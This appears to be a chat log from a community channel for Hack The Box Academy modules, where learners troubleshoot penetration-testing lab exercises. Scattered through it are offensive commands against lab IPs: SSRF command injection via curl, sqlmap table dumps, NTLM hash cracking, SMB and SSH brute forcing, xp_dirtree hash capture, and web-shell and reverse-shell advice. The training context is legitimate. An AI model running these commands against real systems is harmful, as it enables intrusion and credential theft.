#modules
password attacks medium was an interesting turn of events....
how well recognized is CREST?
they are partnered with HTB Academy
lol
I'm thinking after security+ I might as well do the CREST penetration testing skill path
it only would make sense
depending on if CREST is a good place to get penetration testing certs from
in terms of HR
I was wondering the same thing myself. If I am not mistaken, you need to get CPSA before getting CRT
CPSA is a multiple choice exam
after reading and all I think I go with comptia + security
it is more accepted and known by HR and companies looking for it
I'll go with CPTS then offensive sec certs
they are kind of the best but quite expensive when compared with others
Guys I have a confusion in "Using web proxies" Module (i.e. Repeating Requests). Can someone assist me? Thanks
Unable to find the flag
which part
Hey, I'm working on the Active Directory Bloodhound module, and I'm having a problem uploading the zip in Bloodhound
getting this error:
I tried using Kali and PwnBox. Same error. I did some Googling and I think they used SharpHound.ps1. Can anybody get this to the right people to perhaps run the SharpHound.exe ingestor?
Okay, I just ran pimpmykali and used the "fix Bloodhound" option. Seems to be working now on my Kali! Nice!
Hey Folks, could anyone recommend a module that covers AWS security? When I search for it it turns up a load of modules, then doesn't mention it in the summary of the module
As far as I know, there are currently no modules on the topic of AWS Security
Huh weird, it comes up as quoted text when you search for it
How about for general WebAppSec, I've done the basic ones
Cheers mate
There are many modules
Blind SQL Injection
HTTPs/TLS Attacks
File Inclusion
SQL Injection Fundamentals
SQLMap Essentials
Cross-Site Scripting (XSS)
Login Brute Forcing
Broken Authentication
Command Injections
Web Attacks
File Upload Attacks
Server-side Attacks
Session Security
Web Service & API Attacks
Introduction to Deserialization Attacks
Attacking Authentication Mechanisms
Introduction to NoSQL Injection
Cool you've been looking into these, had been considering the deserialisation intro one, only a little was covered in starting point
I feel there's tonnes more to learn there
As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
plss help me with this question
Any solution to do the exercise with PetitPotam and PrintNightmare in Bleeding Vulnerabilities module, in AD section? NoPac seems to be the only tool to work well
anyone can help with this
Hi! I'm stuck at SSRF Exploitation Example. I managed to run the following command:
||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=ls" ||
but whenever I try anything with a space, for example, the following command:
||curl -i -s "http://10.129.201.238/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=uname -a" ||
I get the following error returned:
||URL can't contain control characters. '/load?q=http::////127.0.0.1:5000/runme?x=uname -a' (found at least ' ')||
Does this mean that this way of doing it as described in the exercise is not the way to do it? Can somebody help me
@green bolt Spamming that in every channel will just result in you getting a mute.
ok
so if I have any doubt then how should I solve it?
You can either wait for a response or wait for a response but also google and find your answer in the mean time.
yes u are right but on google i can't find it
i know how to know ip page from cmd
Use the resources provided in the module
ok thanks
all those password list problems dont rely on rockyou etc
you need to create personalised username and password lists
(i.e. the point of the module)
Hi! Anyone know if with the "Silver Annual" plan I can access the Tier III and IV modules?
Or just until the Tier II.
Ok, that was my fear. I'm in doubt because there are a lot of Tier III modules that I would like to do too. Maybe is better to contract the Platinum subscription.
Solved it. It's way easier than I thought lol.
I can't find fqdn of x.x.x.203 in footprinting module, I try many ways but can't find it. Any clues ?
I try to finish the module ACTIVE DIRECTORY ENUMERATION & ATTACKS but I'm stuck on a question in the section AD Enumeration & Attacks - Skills Assessment Part I
I found an NTLM hash fdxxxxxxxxxxxxxxxxxxxxxxxxxxxx3a
Then, I used hashcat -m 1000 /tmp/hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
But I didn't find anything.
What am I doing wrong?
in the Footprinting module > Cloud Resources > Google Search for AWS
intext:<text-covered> inurl:amazonaws.com
how to replicate this. text is covered. not sure what to search for
I need to confirm an answer from Introduction to active directory module >>Examining group policy section can i dm someone?
Module Name: Attacking Common Services
Section Name: Attacking SMB
i have run this cmd ~/Tool/CrackMapExec/cme smb 10.129.203.6 -u 'jason' -p pws.list --local-auth , but i got nothing. can i dm someone for help? (PS: i got it)
where is general
I have spent almost a week on the one question, where is the students mail. I have found it......mail:/var/mail:/usr/sbin/nologin
I have chopped that path up many different ways as well, to get it to work. I have tried both the etc command and the env command. I have tried everything. I'm not trying to rag but I think you should take that question off there, I have wasted a lot of time with it. Either it's broken, or I'm just not doing it right. Here let me paste the whole line.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
Define path, is that different than pwd? What am I supposed to learn from this question? That's the main goal anyways. I think I've got the searching path thing down pretty well: ll, ls -a, pwd, cat /etc/passwd, uname -a. I've been down every file on the student's shell
Hello everyone, I'm trying to complete Skill Assessment for "File Upload Attacks". When I'm trying to upload the file it's using a GET request to file upload and just the name is being sent to the server side. Any hint where to start? I can see upload.php in script.js but don't know what to do ?
try read source code of upload.php
How, by sending a GET Request? I'm kind of confused?
in the module it shows methods to read source code like php wrappers
So i need to craft a POST request from scratch. because i can not see any post request going on, when i try to upload file.
i think if you can upload an image to find source code
look at section (Limited File Uploads)
Thanks mate.
Is there someone that has finished the ACTIVE DIRECTORY ENUMERATION & ATTACKS module? I am stuck on trying to crack a NTLM hash since 3 days
If you're meant to crack it, it should usually crack within the first few minutes.
You're right but I don't have any other idea. Basically, I am on a question that tells me to find a password, and all I have is the NTLM hash. I searched for files that could contain a password. I also searched for it in the description of the user: nothing. Have you completed this module?
DM me
You need to find the DNS zone that contains multiple subdomains. Then you will need to brute force a particular second level subdomain i.e *.blog.example.com.
I found dev, mail, app
Dev contains multiple subdomains
Thanks for your answer
Make sure you use a wordlist that resembles being ferocious and forceful, like a lion.
Hi guys, i'm stuck at Internal Password Spraying - from Windows. I try to find the user with password 'Winter2022.'. When I run the ps script as shown in the module it just doesn't write anything to the outputfile ;/ Can anyone help me?
Hello guys, I just joined this community, want to try to learn from here, I'm already stuck at the first module,
It asks me " Based on the commands executed, what is likely to be the operating system flavor of this instance?
Linux htb-uxufv3qysx 6.0.0-12parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.12-1parrot1 (2023-01-12) x86_64 GNU/Linux "
And I obviously answer :
"The operating system flavor of this instance is likely to be a version of Debian Linux. The text "Debian 6.0.12-1parrot1" in the output of the command gives an indication that this particular version of Linux is based on Debian and version 6.0.12-1parrot1."
But it's not working, won't give me right.. help me please!
Name and section of module?
i would like to subscribe to the student plan but i currently don't have access to it and i don't know what an academic email is
Introduction
like second section
Take a peek at the hint button, next to the question. It should give you what you need.
Dm
Academic email is an email given to you by your school
Okay thank u
I want to send a file from my linux host to a windows host in an internal network (which offers ssh)
I'm using proxychains scp text.txt mlefay@172.16.5.35:C:\Users\mlefay\Desktop
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.5.35:22 ... OK
mlefay@172.16.5.35's password:
scp: Connection closed
but the upload does not work
is my syntax correct?
can someone help me with password attacks-Network Services, i got all the questions except the one about rdp, i tried using the given passwords and username lists with crackmapexec and hydra but got nothing
Hi all I hope you are having a good day. I have got a question about a question from Password Attacks Module:
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
I have created the file but there are 94044 tries to be done. Is this how it's supposed to be?
guys
I need help
Here is my problem
I'm using a windows computer and my other hack computer isn't working anymore but I wanna continue hacking, so I need to download linux on a windows computer but I'm worried that it will erase all my stuff from windows
so I downloaded Virtual Box but what is its use?
what do i do guys
I NEED HELP
pls
if this isnt related to a module, i would take this general chat, or community help... VirtualBox allows you to run multiple OS at the same time.
you need to verify yourself
thx
Hey can someone help me 2 install open vpn and configure it for labs? thx
what module?
Im using parrot os
Like i mean i can't find where 2 download openvpn
When i download it it saves as .exe
and im on a linux machine
open terminal and type sudo apt install openvpn
OK
Done tysm
Also another problem is that when i try to use telnet it gives me this error telnet: Unable to connect to remote host: Connection timed out
This is not related to Academy modules. Please don't have this conversation in here
@flint depot why not visit YouTube
Ok , sorry
I don't understand how people can see Academy modules chat when not verified, but can't see the general chat...isn't that backwards
Because gen chat is somewhat contained... And more ruthless to people being not smart "hack this pls"
idk
Hello, I'm stuck at SQLmap essentials ~ Attack Tuning. I have to get the content of table "flag6" - "Detect and exploit SQLi vulnerability in GET parameter col having non-standard boundaries". I use this command sqlmap http://167.99.195.247:32676/case6.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3 but it doesn't give me any injections. Could anyone give me a hint please?
@flint depot https://youtu.be/8mns5yqMfZk
Is there any way to put the academy on spanish?
@flint depot no problem
I mean, to be totally honest that's the best response to those messages
solved it, i did put the correct prefix on dc but didnt use it
Reread that section. There's a part of it that tells you exactly what you need to do
You don't need GO in mssqlclient
One question, how could I've known that the prefix was ´)'? that was the hint
A bit of educated guessing.
but there could be so many possibilities right?
Yes
Why doesn't SQLmap work if I use ?col=1 instead of ?col=id ?
Because col=1 is not the correct amount of columns. Idk why it works with col=id
Count the number of columns on the page lol
well there are 5 columns
Well sometimes sqlmap has issues detecting how many columns there are. So you need to tell it how many columns there are
--union-cols=5 right?
thanks, i got the flag
I believe it's because id may be the name of the column
Or some SQL nonsense
Well yea, logically that's the only thing that makes sense
But actually no. Why would that work.
SQL is something I want to dive deep into, but also don't
Like even just to understand some of the why's
Lmao. SQL is... SQL. I had a professor for my intro to databases class last semester who said "If you're a bad database administrator, you'll make yourself vulnerable to SQL Injection"
I got up and walked out of the room
can i dm you?
I mean, I guess, but I can't promise I'll get back to you right away
have you done this section?
Yes
Does any module exist that teaches you to program, or do I have to learn that on other websites?
what u meant by program?
depends on that
For example python or powershell
One does not simply "Learn to program"
Ik
theres a module on python and powershell as well ig
Ok thanks
Hackthebox probably won't be the best place to learn to program. Pick up python, and watch a course on freecodecamp.
^^
Then just screw around and learn the ins and outs
Make games, make applications, start a github, etc.
You learn programming by doing.
You learn tech in general by doing. Doesn't matter what specific subject you choose to focus on
Running into an issue with the medium lab on the enumeration with nmap module
can i dm you for help? mssqlclient.py WIN-02/mssqlsvc:XXXXXXXX@10.129.203.12 -db flagDB i can't access via mssqlclient (PS. I got it)
Despite following examples given in the prior page regarding version detection against filtered ports, the port remains filtered regardless of the source port I specify
use the --windows-auth flag
I hope there comes a module for xxe :/
Have you looked at this module?
https://academy.hackthebox.com/module/details/134
No, thx tho
Hello everyone, I'm trying to complete Skills Assessment - File Upload Attacks. When I'm trying to upload a file, every time I get "Only images are allowed". I tried all of the Content-Types and added magic bytes, nothing working. Any Hint ?
Upload a regular image and then change the content. But not the Magic Byte. Then it should work
How do i upload image because i tried uploading it via "Contact Us" form but it's not taking as POST request. File is being uploaded as GET request with no file content.
hi everybody, I am at the nmap hardlab, I found the missing port and I am trying to get the version, but had no luck so far. I also tried with netcat, but could not connect. Someone any more hints on this one? I would love some support on this one
Why doesn't sqlmap http://143.110.166.29:32448/case9.php?id=1&uid=1947156619 --randomize=uid --batch --dump work instead of sqlmap -u "http://143.110.166.29:32448/case9.php?id=1&uid=1947156619" --randomize=uid --batch --dump?
Wait, you uploaded an image and get an error message and now you're asking where you can upload an image? I am confused
cuz in the first one you didn't supply the -u flag so sqlmap doesn't know what it's attacking
but i didn't need the -u flag at most of them before
I crafted a POST request after seeing "/contact/upload.php" on script.js as I had done in the earlier section "Limited File Uploads"
Hi guys, i'm having problems with the section brute forcing cookies of Broken authentication module? Any help?
I'm trying to fuzz the role with some Seclists, and embed it in the cookie and encode it, but no results. I'm using burp intruder: add prefix and suffix, and encode it (ascii hex - base64); but no results
Then upload a file there
Try to read and understand the source code.
I'm confused about how to bypass the mime-type filter.
DM
This question is confusing. I know…
In this case the role is || super ||
Appreciate u man
Like a lion?
I think saying like a lion might make him look for a wrong list. But the descriptor's definitely a good hint
lions are pretty fierce though
After banging my head against the keyboard and getting some help from @west canopy I finally managed to pass the Predictable Reset Token section on the Broken Authentication module. These are some tips that will nudge you in the right direction and avoid frustration.
Use the script below for Q1
The server runs on GMT time. Most of the trouble that I had with online epoch converters is that they would convert to my timezone, not GMT, and the time needs to be in milliseconds, otherwise it won't work.
Pay attention to that, otherwise you won't get the flag.
For Q2 the temp password follows the same pattern both for the htbuser and the htbadmin and is encoded.
You need to discover how it was encoded and if it was double, triple or more encoded.
You can use cyberchef or any other online tool, I recommend dencode.com for ease of usage.
After you get the cleartext, change what it needs to be changed then encode it back to login.
How do I get the final flag at the SQLmap Essentials Assessment? I found the a***.php site with the ID data param but it doesn't seem to be injectable. I found no other attack vector. Could someone give me a hint?
i don't know if this is a hint, but did you save that burp request as a file and run sqlmap with -r? sometimes that helps, and I have had better luck that way
So in Shells & Payloads- The Live Engagement module, I am using EternalBlue to try to get to the server :
but everytime i run it says
Exploit completed, but no session was created.
will try it
I tried different payloads but i keep getting the same thing
filename.req <--- ippsec saves it like this, so that's how i have been doing it
There's more than 1 exploit for MS17-010
When I do sqlmap ... --data='id=1', is that considered JSON? no right? this is: sqlmap --data='{"id":1}'?
Yea. You have to do it the second way
i dont think thats needed if you run the file.req with sqlmap
ok thanks
Yea. If you save the request it'll already be formatted properly
think i got the injection, but why is sqlmap typing it so slow?
types character by character
Cuz its doing a time based injection
Yes, it's painfully slow. No, there's nothing you can do about it
Ok
well that was khm awkward
Ty for the hint
Np
The flag is slowly comin up ^^
It's probably because in your first example the URL contains special bash characters, e.g., &. While the second has the URL wrapped in quotes meaning those characters are interpreted literally.
yea i think that's it, thanks
& has special meaning in the shell. I would recommend doing some linux command line basics
in certain cases you can use something like --threads 8 to speed it up
dude, i spent hours doing this Footprinting - medium lab, and I have tried the same thing multiple times--- reset the server twice and then it works
Hi,
could someone help with Assessment 2 for noSQL injection, please?
I have tried many payloads and have no idea how to pwn it, please help
i could try, haven't done any academy stuff but i'm quite familiar with nosqli
What's the issue you're having?
I have tried to execute payloads, but it doesnt work
you need ip for testing or what ?
what do you mean by "execute payloads"?
ip for testing? what?
afaik most of the modules is setup in a way that you can interact with them from htb vpn
ok, i will try
you mean, I can connect to ip, which was given me for testing (HTB lab)
i still don't get what exactly you mean by that. Are you using htb vpn to access the vulnerable environment?
like can you see the stuff that you're supposed to be hacking?
no, i don't use vpn
Are you using the pwnbox?
yes, i mean it, is it possible ?
no
You are using your own vm?
no
So you are using the virtual machine from the website
That may be why; if it's an IP that is 10.x.x.x you need to attack it using a VM through the VPN or through the pwnbox
oh it's publicly available?
yes
you don't need vpn then
If it's a web app you should be fine to access it wherever. But it is not recommended to use a Windows machine to do any of the enumeration or anything like that through tools
So you are dual booting with Kali
yes, something like this
Were there any template payloads that they gave you, or examples that you can follow? Sometimes if you're given a template command, you need to change the IP to match the target so it can execute
that's the last task - no additional info, except it has noSQL injection and ip
Within the module I mean
Any help on Skills Assessment - Broken Authentication?
Hello, I have a biiit problem in Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and try to bruteforce FTP localhost using rockyou-30, but still that doesn't help
could someone give me a nudge with Footprinting - Medium. I'm logged in as Administrator, think im stuck due to lack of MSSQL exp...
whats the exact issue you're having?
||I have looked around for HTB user password, but I dont see anything...not sure if I just dont know how to manuever around in MSSQL or what.. i have looked all through the db||
i'm not familiar with any of the academy stuff so i would probably need more context on that. I assume you've pwned db somehow and now you're at the point where you're supposed to get user flag. Have you tried doing code exec directly? ie xp_cmdshell
nope..didnt even know how to do that...i will look it up on google
maybe try using stuff like payload all the things
that's somehow educative on sqli or just direct db interaction
@iron plaza need help?
lool yea and I was typing an essay and deleted it when I saw your message
that's the reason why ctrl + x exists
just ctrl + a, ctrl + x, type new message, ctrl + v
With regards to the second question in the Shells & Payloads' Live Engagement I have uploaded the ||cmd.war|| file from ||laudanum|| in the manager's section then went to ||.../cmd/cmd.jsp|| and placed my commands for cmd... I got hits with systeminfo and whoami but when I try dir or anything else it gives an error, so how do I go about browsing the C:\ directory or am I missing something?
what kind of error?
like random java error from the site
does just dir work?
seems the shell is not a full fledged shell
no it does not
vpn and can only be accessed by rdp-ing to the foothold first
It's in the sql db
what if you do ping /n 5 your.box while looking at the traffic (do you get hit?)? have you tried using reverse shell?
Ok I'll look around again, ty
sorry for misleading info
No worries
If you're RDP in it's a bit easier
the module does require me to upload a reverse shell which I did and got it accepted hence how i was able to get hit with systeminfo and whoami
rev shell is not the same thing as cmd exec payload
Yup, thats what i did
rev shell -> you get a session back to your box
cmd exec -> http://box/cmd.jsp?cmd=whoami
Navigating the sql ui is a bit of a pain
I'll open my eyes and look again
sorry my bad it was a shell ... the upload section accepts a .WAR file
so you have a rev shell?
no I dont have a rev shell I only get the cmd exec
ok, i thought that's the case. At that point you likely want to get a rev shell for ease of use but there might be issues with the actual shell execution because you're having issues using dir. I would try to carefully look at the error message you get while using dir and then possibly compare it to something like dir c:\. If you manage that to work somehow, i'd get a rev shell afterwards
thinking about it, you can possibly also create a payload that's just a rev shell itself and not a cmd exec payload, i assume you've used msfvenom to generate the payload. If that's the case you just use different payload when generating and that should be it to get a rev shell more easily
I probably have to tinker with it ... The only other thing I can think of is uploading another type of shell and relabel it as a WAR file through burpsuite
yeah, as i've said you can try uploading actual rev shell payload instead of cmd exec payload
thanks ... will try that
Hey guys. I'm having an issue on the nmap firewall medium lab. Is it asking for the version number of the DNS service or just the version name? I'm able to get the version number of just about every other service except the DNS
is there anyone that could point me in the right direction?
Consider which protocol DNS uses by default
could also slow down the number of packets you're sending
think with -t switch
I've done a UDP scan with version detection and tried a version detection script. Same as the others
i can try slowing it down, I'll let you know what happens
seems to be the same
Which script did you use?
i tried quite a few. do i need to use the filter to put them up here?
Try it with || dns-nsid ||
DM
yo mods, how is my name "Alpha" breaking the rules?
Wrong section to be asking but, please read the #rules
rule 10 is so.. messed up
did you figure it out?
I did. issue was with my Parrot tools. tried on pwnbox and it worked
huh, nmap should work the same everywhere regardless of distro used
Most likely just needed to reset the VPN connection
If it worked on pwnbox and not on vm
idk. ran it on my VM instance and the script didnt run. ran the same command on pwnbox and the script ran
i was able to get everything else except that specific script to run
guess i need to do some updates
did it somehow error out?
no. just didnt do anything
Probably update
Or just version difference, did you catch the nmap version on pwnbox
i wouldn't think a slight version difference could cause nmap to not scan dns
both are 7.92
is your vpn working just fine on your box?
and you were able to scan it just fine ¯\_(ツ)_/¯
(can you ping the box just fine?)
yes. all scans worked as they should. just not the script
sorry not that particular script
interesting, no clue what that's about
Weird
I'm gonna work on it before continuing. If it's not working now it could cause me issues later. Thanks everyone for all the help. I'm sure I'll be back here soon lol
if you really want to try to figure out what the issue is, you could use verbose/debug flags on nmap or look at the flowing traffic, that could possibly help
i just may do that too.
Finally got it! Man, I was so focused on something else
Check if the script is even present on your VM. It may not be present at all
Or watch the HTB AMA video. There is also this question
Hey Bunny, could i get some help on the Broken Auth Skills Assessment? I'm having some trouble on figuring what to do next
Hello can someone please help me figure out why redis for redeemer isn't working
When I ping the server, I get Pong. I fully connect with it but the second I type a command to pull or see data from the server the server stops
sure, DM me
well it is there. i can see it in the /usr/share/nmap/scripts folder and i can cat it out and it shows a script. maybe i just need a reboot
Redeemer is a #boxes question; to see that channel- verify your HTB account in #bot-commands per #welcome
i think someone was asking about that recently as well in here, isn't it really part of academy? i don't know myself, haven't done any academy stuff
It's not
HTB standard site w/boxes is separate from academy, different accounts - it would be cool if they would merge them
i thought it was more like starting point boxes vs regular boxes - it's pretty much the same from my point of view
I told you the better place to ask your question
This channel is for modules on htb academy
Oh sorry I just saw it and thank you
okay i searched the forums for answers and still could not figure it out, zero issues with thm vpn and connecting so i don't think i am doing anything wrong. problem is it says both lab and starting point are connected but i can't even ping the damn box.. what's up? not a paying member yet, are these dead machines?? wtf?
also switched from udp to tcp, nothing..
Take a step back; what is the machine you're trying to attack, what module is it on, if it's related to the #starting-point boxes on the main site check there
hmmm
Also you need to be on the htb VPN, benefit of the doubt that's what you meant
hi
it does connect, i think i am trying to access paid shit idk
perhaps that is why i cannot ping box
If it's not a 10.x.x.x format then it may be a web server you're trying to access, in which case it will be formatted as ip:port
ok guys update from the issue earlier. I moved over to my kali box and was having the same exact issue. but i noticed i was using the TCP VPN connection. I then downloaded a fresh UDP connection file and connected that way. reran the exact same command that worked on the pwn box and was able to get the script to get the bind.version to show up. idk if this will help anyone else having the issue or prove im an idiot but hey thats what i discovered
If it is a webpage then try navigating through your web browser
er
But you're not telling us what module or content you're attempting
Starting point machines are free on the htb main site
So it shouldn't be an issue of "paid content" but you're freaking out and not actually providing much info aside from "I can't connect" which really doesn't help
not freaking out lol, many ctf platforms to pop
Cool won't help you then
It's also possible the box is not able to be pinged at all, sometimes that is the case
But accessible via other means
I said this to someone a few days ago, and I'll say it again here. Nobody is obligated to help you. If someone takes the time to try to help you sort out your issue the least you can do is be nice to them. They get nothing out of helping you and are doing so solely to be nice. If you decide to be an ass you're not gonna get help, simple as that
Anyway that's all the help that can be offered with the limited information provided
99% of the time with content, it's a user issue not a box issue
this is true
It is nice
As stated, without much other information not much we can do to assist you
it's okay i'm doing other ctf's anyways, figured i sign up to htb is all
Just stop bothering lol. After reading your conversation I'm convinced he's just trolling
Same
If you're still connected to a different VPN that may be an issue btw
nah, ran sudo killall openvpn then reconnected and still same issue, ill look more into later it's no big deal
Just throwing darts at the dartboard
So, I was able to solve the "enumerate the SMTP service even further and find the username that exists on the system". I did this using the smtp-user-enum tool. And yet, for some reason unknown to me, they all showed up as "no result", so then I went and manually VRFY'd each user via telnet and one of them finally showed code 252 … could someone explain to me why this happened? Just wondering why smtp-user-enum displayed the answer as no result
cool, are you making writeups?
What was the command you used?
Did you use the provided wordlist?
Writeups for any modules above tier 0 are strictly forbidden
I doubt they even know what academy is tbh tux
Fair point
Sounds like they're stuck on the starting point box
God, they really gotta put this channel behind verification
But seeing as they probably don't have reading comprehension: they probably didn't read #welcome
honestly I couldn't care less. They clearly showed they don't want help
The server needs some time to react. There is a parameter in smtp-user-enum for this.
The default value is too fast and the server cannot respond to the request. Therefore you get this answer
Ah yea, that's it. Been a while since I did that module
Ohhhh, I see... Is there any way to change such a default value? I'm just curious, that's all.
smtp-user-enum Usage Example Use the VRFY method (-M VRFY) to search for the specified user (-u root) on the target server (-t 192.168.1.25):
root@kali:~# smtp-user-enum -M VRFY -u root -t 192.168.1.25 Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan ...
^
hmmm I see, apparently it only waits for 5< seconds for a reply by default... so that's why! well, now we know
Yeah telnet is a slowwww service
I think that w argument that is most common is 15
guys do u face VPN issues ?
Small (timesaver) for the Password module HARD please! - for the Johanna account I realise I need to use the hashcat custom rules applied to the password list in the resources - but did you also apply the password policy rules from earlier in the section to reduce the size of the mutated password list? i.e. remove shorter than 8, remove no special chars, remove no numbers? thx
Got it, all good, always post before waiting long enough lol
footprinting hard lab was fun, better than the medium
Ya big loading times
Anyone available to assist with the flag.txt location on Attacking Common Applications - Skills Assessment II please? I've tried searching with ||find / -name flag.txt 2>/dev/null|| and ||find / -name flag* 2>/dev/null||, but I'm not finding it. Are we supposed to priv esc here?
omg I finally completed all tasks on the IMAP/POP3 module... man, accessing those emails for the flag was a bit confusing... I just wasn't used to those IMAP commands at all... but I finally got it... after 5 hours
Maybe it has some chars at start *flag*
@compact garnet next time try with evolution
Hello, I have a bit of a problem in the Login Brute Forcing module, Service Skills Assessment, the last task. I know the user, and I try to bruteforce FTP on localhost using rockyou-30, but still that doesn't help
@quasi moth I am on that selection and think u will use the password list that u created
Hmmm, I'll try this one
Yeap give it a try
how good is a successful evil-winrm login on administrator for passwd lab hard
Hello! Anyone working with the attacking common services modules! the attacking smb section!
do you have a specific question about the exercise or in general you are seeking to do it with other person as well?
I'm stuck in a part of the exercise, I've tried some things but I'm running out of ideas!
There are like 3 questions, mind sharing on which one of them you are stuck?
I'm trying to find the password for the user, but I brute force with the resource list and get nothing... I tried to download the id_rsa file through the NULL session but I get access denied...
I'm looking for the enum4linux-ng.py that the cheatsheet mentions but I can't find it on GitHub...
You have the username and you have a potential password list, use them
I used them but it doesn't find any matching password...
I tried both hydra and crackmapexec...
I tried both the smb and ssh protocols
I must be doing something wrong...
The password is there, work on your commands
there must be something else than just typing the commands....
If I use crackmapexec against the target with the password list provided in the resources of the module I should get the password.... I tried many times and I get nothing...
it is very important how you craft your command
crackmapexec smb 10.129.56.219 -u jason -p ./pass.txt
I will check other ways to craft it...
I will try with .list instead of .txt
a machine could have a hostname, and that hostname might be required to be used for certain actions
I have the host name ATTCSVC-LINUX
I haven't used crackmapexec without the IP...
I'm reading the manual and I can't find the hostname option anywhere....
I can use a -d ...
go for it then
Got it!
Now I'm looking for the command to use the private key I got!
any useful guide where these commands appear?!?!
man ssh
Hi
Can I get some help with "Footprinting lab - medium"?
||I have a shell and currently interacting with sqlcmd but I don't have permissions to view "accounts" database. I know I am close but there is something I am missing. ||
pm if you want!
Sure, thanks
I'm doing the Windows Priv Escalation Skills Assessment Part 1
But I can't ping the target machine
100% packet loss
Anyone with that problem too?
In Attacking Common Applications - Attacking GitLab, is there any hint to what users wordlist to use? I think I've used everyone in /usr/share/seclists/Usernames, and now at the xato ones. But I have to pause and resume every time the box times out. I'm doing the attack through Burpsuite. I've found some valid usernames, but nothing that is accepted as the answer.
Try one of the unconventional wordlists in that directory and it should work
I can't ping either. Is it still broken for you?
yea
I went to the #1024429874246590575 and I have seen that they could be down for maintenance
ahhh okay. I guess that explains why it took me a while to connect over vpn too
Hi,
I am again blocked on the file upload module.
It is one of the least complicated modules and yet I am still stuck ...
In the section filter type.
I found an authorized extension, I use the double extension.
I have a content-type which is an image and I added the MIME.
The shell is well uploaded but instead of executing the php code it displays it in Burp and in the browser it tells me that there is an error in the file.
The content of your web request and the Content-Type are mismatched. GIF8 != JPEG
I have the same with the same extension and content-type.
I have tried many requests with many extensions.
The only MIME accepted I have found is GIF8
Dm
no spoilers please
still no connection
same can't connect to any modules
O
I am new, how to use
hash
means
Hi, I'm stuck in Attacking Common Services - Attacking DNS module. Can somebody give me a hint?
What exactly you're stuck on?
I have found subdomains but I'm not able to transfer attack those names
I guess that's what I have to do but the question is not so clear to me
Did you add inlanefreight.htb to your /etc/hosts? You could either try to get a zone transfer with dig based on the name servers you have gathered or you could bruteforce the subdomains with subbrute
yes, I added every discovered domain to /etc/hosts and I AXFR-attacked every domain, but nothing.
Can I DM you?
yeah sure!!
i'm stuck on that too, are you on meow
@toxic sedge i'm stuck on that too, are you on meow
Please don't have this conversation in this channel. It's not in the slightest bit related to HTB Academy modules
ok
and type the machine IP address
@graceful rampart although this is coming up as Academy modules?
Yes. This channel is for academy modules. You guys are discussing starting point machines which are not a part of htb academy
still the same
Check #1024429874246590575 many servers are undergoing maintenance
extended maintenance*
Hello! Anyone working with the attacking SQL section?!
whats your question
I'm trying to steal the hash but I can't get the command right...
I type the command in the SQL... and then in my Pwnbox nothing happens...
How do I even know if I'm typing the right command...
Are you getting a new line when you hit enter?
Are you ending the SQL query with ;
I'm using mssqlclient.py, when I type any of the commands with ;
it's not working
the mysql doesn't work, I don't know why
Unless you show us a screenshot or an error message there isn't much anyone can do to help you
"it's not working" leaves a lot open to interpretation
There's an extra period at the end of that IP
and then this in my Pwnbox
Main thing is that I don't know if it should work... I'm trying to follow the section...
Yes. You're doing it right. You have an extra period in the IP in your SQL command. It should be EXEC master..xp/dirtree '\\10.129.74.243\share'
I don't see any "share" folder created on my machine... it's kind of awkward that it will work
this is not the IP that you should use
Tux did you finish the Broken Authentication Module? If so, could you give me a nudge on the right direction on the Skills Assessment section? I've been stuck at enumerating users and can't seem to find any.
I tried with my IP but it doesn't work...
following the examples in the section of the module will help you go through, carefully go through them in order to understand the methodology and tools
try to visualise what needs to happen, once you've managed to do that
you will be able to get the desired result
They don't explain the commands they use much... I assume "something" called share must be created on my machine...
neither responder nor impacket works...
both SQL command examples have a description of what will happen, even if it's a short one
I think I got it
hey guys, i need a little help with the bash scripting module.
Submit the echo statement that would print "www2.inlanefreight.com" when running the last "Arrays.sh" script.
Can anyone help out with the answer format?
HTB will not allow me to log in even though it's my first time today trying to log in. I keep getting the message about new users only being allowed to log in once a day.
never mind. It suddenly let me in.
Hey, I'm doing File Transfers, I'm on the Windows File Transfer Methods, on the question "Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.". I managed to upload the file, I managed to unzip it, but when I'm running hasher I get "User do not have permission to read the file.". Is it the way I uploaded the file, or should I escalate privileges to be able to run hasher?
Hello,
In the active Infrastructure identification module, how do I add the vhosts?
In which module do I see that?
I'm absolutely stuck on the Password Attacks module, section Password Reuse / Default Passwords
Hello again! I'm trying to unhash the password, but with hashcat I get this...
The hex means it's zipped?!
I found the users sam, kira and will. That's it. I cannot figure out how to proceed.
or I should use another wordlist...
from which module is this?
Attacking common services, attacking SQL
Search the Internet for standard passwords for MySQL
How did you get this hash? DM me
I don't know what I'm missing. I already googled and foot r*** as a default user without a password. But it doesn't work.
At the 2nd assessment of Brute Forcing they refer to an employee name you already know, do they refer to the username used in the previous skill assessment to login into the admin page?
Nvm, got it!
That threw me off lol
This might help you
|| https://github.com/ihebski/DefaultCreds-cheat-sheet ||
Hi, can somebody help with the last task in Login Brute Forcing?
this one?
Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.
Anyone here got a sec to validate something on shells and payloads?
I think I know the right exploit its just not where the hint referred me to
Yes
Anyone knows where can I find the commands to use with mssqlclient.py?!?
Just a quick question does the answer to this section require tunneling or pivoting by any chance?
@rustic sage no
